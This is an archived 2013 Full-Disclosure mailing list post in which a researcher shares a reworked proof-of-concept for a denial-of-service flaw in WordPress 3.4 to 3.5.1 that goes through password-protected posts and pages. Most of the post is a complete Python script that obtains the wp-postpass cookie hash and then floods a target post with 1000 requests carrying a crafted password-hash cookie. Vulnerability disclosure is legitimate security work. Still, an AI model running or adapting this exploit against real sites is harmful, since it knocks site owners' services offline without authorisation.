lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Sat, 29 Jun 2013 23:51:42 +0300 From: "MustLive" <mustlive@...security.com.ua> To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>, "1337 Exploit DataBase" <mr.inj3ct0r@...il.com> Subject: WordPress Denial of Service exploit Hello list! Here is my version of vnd's PoC (https://vndh.net/note:wordpress-351-denial-service). This exploit is for Denial of Service vulnerability in WordPress 3.4 - 3.5.1. My version solves some issues in original PoC. Concerning this Denial of Service in WordPress. As I wrote last week in my post concerning release of WordPress 3.5.2, this issue concerns both posts and pages which are password protected. Not only posts as vnd wrote and similarly WP guys wrote at their site (in WP 3.5.2 announcement and in the codex). Since WordPress supports password at both posts and pages, as I wrote in 2010 concerning Brute Force and Insufficient Authorization vulnerabilities in WordPress (http://www.securityfocus.com/archive/1/510274). wordpress-dos.py # WordPress Denial of Service exploit # WordPress 3.4 - 3.5.1 # Author: vnd at vndh.net # Version by MustLive (http://websecurity.com.ua) import httplib import re def get_cookie_hash(hostname, url): headers = {'Content-type': 'application/x-www-form-urlencoded'} handler = httplib.HTTPConnection(hostname) handler.request('POST', url, 'post_password=', headers=headers) response = handler.getresponse() set_cookie = response.getheader('set-cookie') if set_cookie is None: raise RuntimeError('cannot fetch set-cookie header') pattern = re.compile('wp-postpass_([0-9a-f]{32})') result = pattern.search(set_cookie) if result is None: raise RuntimeError('cannot fetch cookie hash') return result.groups()[0] def send_request(hostname, post, cookie_name): headers = {'Cookie': 'wp-postpass_%s=%%24P%%24Spaddding' % cookie_name} handler = httplib.HTTPConnection(hostname) handler.request('GET', post, 'action=postpass&post_password=a', headers=headers) if __name__ == '__main__': hostname = 'site' posturl = '/?p=4' # link to password protected post or page requests = 1000 pattern = re.compile('(.+/)') url = pattern.search(posturl).groups()[0] + 'wp-pass.php' cookie_hash = get_cookie_hash(hostname, url) print '[+] received cookie hash: %s' % cookie_hash for i in xrange(requests): print '[+] sending request %d...' % (i + 1) send_request(hostname, posturl, cookie_hash) Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists